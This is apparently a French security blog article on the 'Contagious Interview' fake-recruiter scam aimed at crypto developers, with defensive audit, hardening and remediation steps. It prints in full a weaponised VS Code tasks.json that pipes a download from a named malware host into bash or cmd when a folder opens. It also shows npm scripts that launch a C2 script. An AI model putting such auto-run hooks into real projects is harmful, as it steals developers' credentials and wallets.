L'Entretien Contagieux : Comment les Faux Recruteurs Piratent les Développeurs

Résumé : Une nouvelle vague d'attaques soutenues par des États-nations cible les développeurs seniors en crypto. Les escrocs se font passer pour des recruteurs et des CTO afin d'inciter les candidats à ouvrir du code malveillant. Cet article décortique le cas 'Martin Erazo', l'exploit 'tasks.json' de VS Code et le 'Protocole de Destruction' nécessaire pour survivre.

Avis de non-responsabilité : Cet article rapporte un incident de cybersécurité spécifique impliquant l'usurpation d'identité de personnes réelles. Les noms « Martin Erazo » et « Ara Vartanian » font référence aux personnages ou identités utilisés par les attaquants. Nous pensons que les vraies personnes portant ces noms sont des victimes innocentes d'usurpation d'identité et ne sont pas impliquées dans ces activités malveillantes.

---

Prompts Midjourney

1. /imagine prompt: A dark, moody cybersecurity visualization of a developer's workstation, a red "WARNING" hologram projecting from a VS Code terminal, malicious code tendrils reaching for a crypto wallet icon, text "Contagious Interview" --ar 16:9
2. /imagine prompt: A split screen composition. Left side: A friendly LinkedIn recruiter profile. Right side: A hacker in a hoodie executing a script, matrix code rain in background, text "Social Engineering" --ar 16:9
3. /imagine prompt: A digital shield protecting a laptop, "VS Code Hardening" concept, sleek blue and white cybernetics, defending against red laser attacks --ar 16:9

---

1. L'Appât Parfait : Le Personnage « Martin Erazo »

Tout commence par un message qui touche tous les points sensibles d'un ingénieur senior :

• Rôle : CTO / Lead Architect.
• Budget : Financement de 6M $ sécurisé.
• Tech : Web3, IA, Infrastructure Décentralisée.

Lors d'une attaque récente et vérifiée, un recruteur se faisant passer pour « Martin Erazo » a pris contact via LinkedIn. Le profil utilisait le nom et la photo d'un véritable directeur de théâtre, mais l'historique professionnel était falsifié pour montrer un pivot soudain vers la « Gestion de Projet IT » en 2025 — un signe classique de compte piraté ou acheté.

L'arnaque pivote rapidement. Ils sautent le filtrage RH standard pour aller directement à un « Entretien Technique » avec la haute direction — dans ce cas, en se faisant passer pour le véritable CTO de l'industrie, Ara Vartanian (actuellement chez Limit Break).

Drapeau Rouge : Le nom du projet change constamment. Le recruteur vend « Betfin » (une plateforme GameFi), mais le Pitch Deck fourni est pour « SpaceXView » (un projet Métavers). Cette incohérence est la marque de fabrique des fraudeurs recyclant des actifs de différentes campagnes.

2. Le Piège : « Vérifiez notre Code MVP »

Le faux « CTO » prétend avoir besoin de votre œil d'expert sur leur code MVP. Ils envoient un lien vers un dépôt GitHub ou un fichier ZIP. Ils vous pressent de l'ouvrir pendant l'entretien ou immédiatement après.

C'est là que l'attaque se produit.

Ils exploitent votre gentillesse et votre ego. Vous pensez que vous êtes là pour trouver des bugs dans leurs composants React. En réalité, les bugs sont des fonctionnalités conçues pour vider vos économies.

3. L'Exploit Technique : Malware Zéro-Clic

Les attaquants utilisent des vulnérabilités « zéro-clic » ou « peu de clics » ciblant les outils de développement. Ils n'ont pas besoin que vous exécutiez l'application. Ils ont juste besoin que vous ouvriez le dossier.

La Preuve (The Smoking Gun) : .vscode/tasks.json

Dans ce cas précis, le dépôt contenait un fichier .vscode/tasks.json transformé en arme. Ce fichier indique à VS Code comment construire le projet.

Le Code Malveillant :

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• « runOn »: « folderOpen » : C'est le déclencheur fatal. Dès l'instant où vous ouvrez le dossier dans VS Code, cette tâche s'exécute automatiquement.
• La Charge Utile (Payload) : Utilise curl pour télécharger un script depuis vscodesettingtask.vercel.app. C'est un hôte de malware connu déguisé en API de paramètres.
• Le Résultat : Le script s'exécute en mémoire, volant instantanément vos mots de passe Chrome, cookies de session et clés SSH.

Le Plan B : Scripts package.json

Si l'exploit VS Code échoue, ils truquent les scripts npm :

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Exécuter npm install ou npm start déclenche server/server.js, un script local de commande et contrôle (C2) qui exfiltre vos variables d'environnement (clés AWS, seeds de portefeuille) vers l'attaquant.

4. Drapeaux Rouges vs Drapeaux Verts

Comment repérer cela avant qu'il ne soit trop tard ?

Si vous êtes développeur, méfiez-vous des « dépôts privés » et des fichiers ZIP. Les entreprises légitimes utilisent des dépôts publics ou des tests à faire chez soi (Take-home tests) via des plateformes standards.

Avertissement : Ce n'est pas la seule façon dont les devs sont attaqués. Lisez sur le Piège du Collaborateur sur Discord et comment les Attaques de la Chaîne d'Approvisionnement compromettent vos dépendances.

5. Protocoles de Sécurité : Comment Passer un Entretien en Toute Sécurité

Si vous êtes un développeur senior, vous serez ciblé. Le durcissement de votre environnement est obligatoire.

Protocole 1 : Environnements « Jetables » (Burner)

N'utilisez JAMAIS votre station de travail principale pour des tests de code.

• Machines Virtuelles : Utilisez VirtualBox ou VMWare.
• Cloud IDE : Utilisez GitHub Codespaces ou Gitpod. Ils sont éphémères et isolés de vos fichiers de portefeuille locaux.

Protocole 2 : Audit Forensique

Avant d'ouvrir tout code inconnu :

1. Vérifiez .vscode/tasks.json : Cherchez runOn: folderOpen.
2. Vérifiez package.json : Cherchez des scripts preinstall ou postinstall suspects.
3. Recherche par mots-clés : Grep pour curl, wget, os.homedir(), .ssh ou wallet.

Protocole 3 : Durcissement de VS Code

Désactivez globalement la « Confiance de l'Espace de Travail » (Workspace Trust).

• Paramètres -> Sécurité -> Espace de Travail -> Confiance : Invite au Démarrage -> Toujours.
• Cela force VS Code à demander la permission avant d'exécuter toute tâche au niveau du dossier.

6. Remédiation : Le « Protocole de Destruction » (The Burn Protocol)

Si vous avez ouvert un dépôt malveillant (comme celui envoyé par le personnage « Martin Erazo »), supposez que vous êtes compromis. La Restauration du Système n'est pas suffisante.

1. Déconnectez : Débranchez le câble Ethernet immédiatement.
2. Brûlez les Portefeuilles : Vos clés privées sont perdues. Créez un nouveau portefeuille sur un appareil propre (téléphone) et transférez les fonds restants. N'utilisez plus jamais l'ancienne seed.
3. Tuez les Sessions : Déconnectez-vous de tous les appareils sur Google, GitHub et AWS. Révoquez toutes les sessions actives.
4. Auditez les Clés SSH : Vérifiez vos paramètres GitHub/GitLab. Les attaquants ajoutent souvent leur clé SSH pour maintenir un accès dérobé. Supprimez toute clé que vous ne reconnaissez pas.
5. Rasez Tout (Nuke It) : Effacez le disque et réinstallez l'OS. C'est la seule façon d'être sûr à 100 % que le rootkit a disparu.

Conclusion

L'arnaque de « l'Entretien Contagieux » retourne votre expertise contre vous. Elle cible votre volonté de résoudre des problèmes. Mais dans le Web3, la paranoïa est une vertu professionnelle. Vérifiez chaque identité, sandboxez chaque dépôt, et ne faites jamais confiance à un « recruteur » qui vous presse de coder.